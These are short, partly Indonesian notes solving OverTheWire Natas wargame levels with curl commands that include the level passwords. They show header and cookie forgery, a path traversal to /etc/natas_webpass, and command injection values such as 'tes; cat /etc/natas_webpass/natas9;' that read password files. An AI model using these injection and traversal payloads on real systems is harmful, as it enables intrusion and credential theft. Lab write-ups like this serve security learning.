Some Natas Solving

banyak cara, salah satu yang saya pakai adalah curl

# curl --help all

# curl --user "username:password" "https://apalah.com"

natas4

curl --referer "http://natas5.natas.labs.overthewire.org/" --user "natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" "http://natas4.natas.labs.overthewire.org"

natas5

curl --user "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" --cookie "loggedin=1" "http://natas5.natas.labs.overthewire.org"

natas6

curl --user "natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1" -X "POST" -d "submit=1&secret=FOEIUWGHFEEUHOFUOIU" "http://natas6.natas.labs.overthewire.org"

natas7

sintax GET PHP

curl --user "natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" "http://natas7.natas.labs.overthewire.org/index.php?page=../../../../../../etc/natas_webpass/natas8"

natas8

# "syahrul" -> ebase64 -> reverse -> hex
# "3d3d516343746d4d6d6c315669563362" <- string <- reverse <- dbase64

python2 :

import base64
base64.b64decode('3d3d516343746d4d6d6c315669563362'.decode('hex')[::-1])

lalu

curl --user "natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe" -X "POST" -d "submit=1&secret=oubWYf2kBq" "http://natas8.natas.labs.overthewire.org"

natas9

# command injection berupa check word in the file
# pass always store in /etc/natas_webpass/natas{} . known from natas7, but only for natas 1-10 :D
tes; cat /etc/natas_webpass/natas9;

natas10

# command injection, berupa check word in a file
grep -i u /etc/natas_webpass/natas10; # file1
grep -i u /etc/natas_webpass/natas10 file1
# -> mencari kata "syah" di file1 & file2

natas11

curl --user "natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK" "http://natas11.natas.labs.overthewire.org/index-source.html"

Wetofu